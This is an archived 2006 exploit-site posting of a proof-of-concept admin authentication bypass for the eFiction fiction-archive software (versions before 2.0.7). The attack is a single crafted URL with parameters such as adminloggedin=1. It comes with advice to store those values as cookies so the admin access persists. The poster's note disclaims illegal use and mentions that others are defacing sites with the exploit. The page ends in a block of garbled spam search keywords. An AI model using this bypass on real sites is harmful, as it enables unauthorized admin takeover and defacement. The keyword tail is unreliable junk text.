about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability



2006-08-25 eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability
Rated as : High Risk

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also
illegally defacing 
these websites under MY name, which is a shame because they ripped it from
a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack
websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites
under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to
your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays
with each page)


securitydot.net - 2006-08-25

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 08:49:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo shirley15r www.wap.ce w w w .p 200 /compo bhavana nu 200 /compo www.tube8. Photo of n Web Host news for c www.tube8. www tamil Akssexy Akssexy WWW.Sex18. sex.sex.se desyhikmah ????? ???? sex.sex.se NAMITHA BL desyhikmah imajenes p pictor sex t574t H.323 applet 33440 Hindhi www.89.c0m netbula yuotube.co flow hot nurses yuotube.co sexy gril assin 200 /compo t144t Asian care /search/ex t144t GOOYANEWS 3x sex.com www.fuckin t156t 24344.csha t244t 200 /compo